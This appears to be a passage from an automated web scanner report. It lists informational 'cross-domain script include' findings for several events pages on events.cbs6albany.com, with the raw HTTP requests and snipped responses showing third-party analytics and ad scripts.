Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:31:25 GMT; HttpOnly
Content-Length: 42035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.168. http://events.cbs6albany.com/albany-ny/events/show/163938585-the-joy-formidable previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/show/163938585-the-joy-formidable

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/show/163938585-the-joy-formidable HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:30:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 196
ETag: "d2556ba10df3df80d010b58955007419"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:30:55 GMT; HttpOnly
Content-Length: 42606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.169. http://events.cbs6albany.com/albany-ny/events/sports+outdoors previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/sports+outdoors

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/sports+outdoors HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 517
ETag: "214b74f974b60cb13b57a5920e79abca"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:44 GMT; HttpOnly
Content-Length: 34568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.170. http://events.cbs6albany.com/albany-ny/events/visual+arts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/visual+arts

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/visual+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:42 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 324
ETag: "d00c19019c4d47e4446c60ba22f19c09"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:42 GMT; HttpOnly
Content-Length: 24687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.171. http://events.cbs6albany.com/albany-ny/movies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/movies

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/movies HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 32
ETag: "f5f1ed3b3227c18003d62913420cc710"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:07 GMT; HttpOnly
Content-Length: 32431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.172. http://events.cbs6albany.com/albany-ny/performers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/performers

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/performers HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "a55c0c6ab44c0027bf134112a42b56f8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 33652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.173. http://events.cbs6albany.com/albany-ny/restaurants previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/restaurants

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/restaurants HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 29
ETag: "500908d34a55fb0526e9f133a76d7c1f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:08 GMT; HttpOnly
Content-Length: 42191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.174. http://events.cbs6albany.com/albany-ny/tickets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/tickets

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/tickets HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
